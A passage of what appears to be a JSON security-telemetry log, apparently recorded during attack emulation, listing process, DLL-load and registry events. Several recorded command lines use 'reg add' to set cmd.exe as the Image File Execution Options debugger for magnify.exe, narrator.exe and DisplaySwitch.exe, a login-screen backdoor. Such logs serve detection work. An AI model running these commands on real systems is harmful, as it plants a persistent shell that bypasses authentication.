"C:\\Windows\\System32\\cmd.exe", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826520000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826520000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826520000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": 
"C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826520000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826520000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" + }, + { + "event_type": "process", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571826520000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\magnify.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 8140, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571827110000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 8140, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826990000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 8140, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", 
+ "timestamp": 131883571826990000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 8140, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826990000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 8140, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571826990000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 8140, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571827140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}" + }, + { + "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\magnify.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7956, + "ppid": 8140, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571827210000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}", + "unique_ppid": "{42FC7E13-CB3E-5C05-0000-00107A375101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571827140000, + 
"unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571827140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571827140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571827140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571827140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571827140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571827140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", 
+ "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571827140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571827140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "registry", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe", + "registry_value": "magnify.exe", + "timestamp": 131883571827140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "registry", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe\\Debugger", + "registry_value": "Debugger", + "timestamp": 131883571827140000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "process", + "pid": 7956, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571827300000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" + }, + { + "event_type": "process", + "pid": 8140, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571827300000, + "unique_pid": 
"{42FC7E13-CB3E-5C05-0000-00107A375101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7012, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571827380016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571827300000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571827300000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571827300000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571827300000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": 
"C:\\Windows\\System32\\msvcrt.dll", + "pid": 7012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571827300000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" + }, + { + "event_type": "process", + "pid": 7012, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571827450016, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\narrator.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 6112, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571828000000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6112, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571827920000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6112, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571827920000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": 
"C:\\Windows\\System32\\kernel32.dll", + "pid": 6112, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571827920000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6112, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571827920000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6112, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571827920000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" + }, + { + "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\narrator.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4532, + "ppid": 6112, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}", + "unique_ppid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + 
"pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 
131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "registry", + "pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe", + "registry_value": "narrator.exe", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "registry", + "pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe\\Debugger", + "registry_value": "Debugger", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "process", + "pid": 4532, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" + }, + { + "event_type": "process", + "pid": 6112, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571828080000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + 
"parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5920, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571828250000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571828240000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571828240000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571828240000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571828240000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571828240000, 
+ "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" + }, + { + "event_type": "process", + "pid": 5920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571828240000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4764, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571828860000, + "unique_pid": 
"{42FC7E13-CB3E-5C05-0000-0010DE445101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}" + }, + { + "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4916, + "ppid": 4764, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571828950000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}", + "unique_ppid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" 
+ }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", 
+ "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571828860000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" + }, + { + "event_type": "registry", + "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\displayswitch.exe", + "registry_value": "displayswitch.exe", + "timestamp": 131883571829020000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" + }, + { + "event_type": "registry", + "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\displayswitch.exe", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\displayswitch.exe\\Debugger", + "registry_value": "Debugger", + "timestamp": 131883571829020000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" + }, + { + "event_type": "process", + "pid": 4916, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571829020000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" + }, + { + "event_type": "process", + "pid": 4764, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571829020000, + "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + 